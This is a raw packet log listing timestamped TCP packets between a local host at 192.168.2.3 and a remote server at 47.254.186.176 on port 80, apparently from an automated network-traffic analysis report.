Jul 12, 2021 10:29:49.681266069 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.681288958 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.681298018 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.681325912 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.681333065 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.681355000 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.681377888 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.681401014 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.681411982 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.681437969 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.681446075 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.681469917 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.681493044 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.681521893 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.681529045 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.681545973 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.681564093 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.681588888 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.681629896 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.681663990 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.681736946 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.682060003 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.682111025 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.682132959 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.682166100 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.682173014 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.682229042 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.682321072 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.682347059 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.682370901 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.682394981 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.682408094 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.682451963 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.682473898 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.682499886 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.682607889 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.682635069 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.682646036 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.682668924 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.682691097 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.682713985 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.682724953 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.682753086 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.682760000 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.682785034 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.682807922 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.682836056 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.682842970 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.682862997 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.682877064 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.682902098 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.682919979 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.682936907 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.682960033 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.682981968 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.682991982 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.683016062 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.683037996 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.683058023 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.683073044 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.683088064 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.683096886 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.683146954 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.683650970 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.683677912 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.683713913 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.683737993 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.683759928 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.683770895 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.683784962 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.683805943 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.683830023 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.683852911 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.683862925 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.683886051 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.683911085 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.684031010 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.684056044 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.684075117 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.684084892 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.684106112 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.684125900 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.684137106 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.684159040 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.684169054 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.684190989 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.684212923 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.684242964 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.684278011 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.684303045 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.684326887 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.684334993 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.684359074 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.684367895 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.684415102 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.684443951 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.684470892 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.684493065 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.684516907 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.684544086 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.684551001 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.684578896 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.684590101 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.684616089 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.684801102 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.684829950 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.684854031 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.684878111 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.684910059 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.684933901 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.684956074 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.684979916 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.685007095 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.685014963 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.685031891 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.685048103 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.685072899 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.685100079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.685126066 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.685132027 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.685152054 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.685165882 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.685188055 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.685210943 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.685236931 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.685244083 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.685264111 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.685273886 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.685297012 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.685307980 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.685331106 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.685355902 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.685383081 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.685393095 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.685717106 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.685746908 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.685770035 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.685781002 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.685805082 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.685815096 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.685853004 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.685877085 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.685897112 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.685909033 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.685924053 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.685944080 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.685966969 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.685992956 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.686019897 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.686028957 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.686052084 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.686060905 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.686085939 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.686110020 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.686120033 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.686142921 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.686170101 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.686177015 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.686197042 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.686249971 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.686269045 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.686290026 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.686311007 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.686337948 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.686355114 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.686635971 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.686770916 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.686801910 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.686825037 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.686846018 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.686856985 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.686888933 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.686896086 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.686919928 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.686975956 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.687001944 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.687107086 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.687146902 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.687160015 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.687181950 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.687208891 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.687246084 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.687268972 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.687290907 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.687313080 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.687324047 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.687345982 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.687359095 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.687380075 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.687396049 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.687411070 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.687432051 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.687453985 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.687473059 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.687484980 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.687505007 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.687516928 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.687537909 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.687556982 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.687566996 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.687591076 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.687599897 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.687622070 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.687642097 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.687659979 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.687669992 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.687710047 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.688041925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.688071012 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.688095093 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.688118935 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.688129902 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.688154936 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.688175917 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.688185930 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.688208103 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.688229084 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.688241005 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.688280106 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.688311100 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.688369036 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.688390970 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.688429117 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.688487053 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.688510895 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.688533068 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.688555956 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.688568115 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.688587904 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.688596010 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.688616037 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.688635111 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.688643932 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.688667059 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.688707113 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.688741922 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.688792944 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.688930035 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.689049959 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.689076900 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.689105034 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.689116001 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.689136982 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.689161062 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.689187050 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.689193010 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.689198971 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.689382076 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.689407110 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.689430952 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.689441919 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.689466000 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.689506054 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.689528942 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.689553022 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.689575911 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.689589977 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.689618111 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.689663887 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.689692974 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.689716101 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.689738989 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.689762115 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.689773083 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.689795017 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.689805984 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.689831972 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.689855099 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.689877987 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.689888000 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.689909935 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.689920902 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.689944029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.689966917 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.689992905 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.690006971 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.690028906 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.690095901 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.690119028 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.690143108 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.690167904 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.690176964 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.690198898 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.690375090 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.690407038 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.690442085 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.690484047 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.690506935 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.690536022 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.690541983 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.690578938 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.690597057 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.690619946 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.690645933 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.690670013 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.690680981 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.690702915 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.690725088 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.690735102 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.690757036 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.690783024 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.690788984 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.690810919 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.690838099 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.690844059 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.690865993 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.690891027 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.690948009 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.691008091 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.691214085 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.691240072 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.691304922 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.691315889 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.691338062 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.691397905 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.691427946 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.691453934 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.691478014 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.691500902 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.691526890 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.691555977 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.691590071 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.691668987 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.691724062 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.692162037 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.692199945 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.692220926 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.692249060 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.692296982 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.692317009 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.692390919 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.692416906 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.692450047 CEST	80	49755	47.254.186.176	192.168.2.3
